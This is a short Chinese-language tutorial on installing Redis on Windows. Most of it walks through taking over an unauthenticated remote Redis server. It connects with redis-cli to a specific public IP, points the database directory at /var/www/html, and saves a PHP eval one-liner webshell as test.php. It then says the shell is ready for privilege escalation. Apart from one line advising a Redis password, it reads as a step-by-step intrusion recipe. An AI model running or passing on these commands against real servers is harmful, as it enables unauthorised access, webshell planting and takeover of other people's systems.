redis安装：

windows安装包：http://pan.baidu.com/s/1i3jLlC5

下载下来之后，开始安装：

redis-server.exe redis.conf：

简单一步，安装成功，保持这个windows持续运行~

查看一下我们本机的端口，可以看到多了一个6379端口，安全风险来了，记得设置redis的密码~

接下来，开始利用redis-cli.exe来进行远程redis的入侵：

如果远程redis数据库存在未授权访问漏洞，则可以直接上传shell：

开启redis客户端

输入以下命令来连接远程redis

redis-cli -h 125.39.185.150 -p 6379

接下来，在远程redis内存中设置数据：

config set dir /var/www/html（在内存中设置切换的web目录/var/www/html）

config set dbfilename test.php（在内存中的/var/www/html目录下建立一个test.php文件）

set xiaoma "<?php @eval($_POST[mi]);?>"（设置key-value，此时该值在Memory中）

save （将Memory中的key-value保存到硬盘，并保存为test.php文件）

四个OK就搞定了~

此时，就可以直接连shell，开始提权了~

redis入侵参考：

http://www.wooyun.org/bugs/wooyun-2015-0101465

http://www.wooyun.org/bugs/wooyun-2010-0105096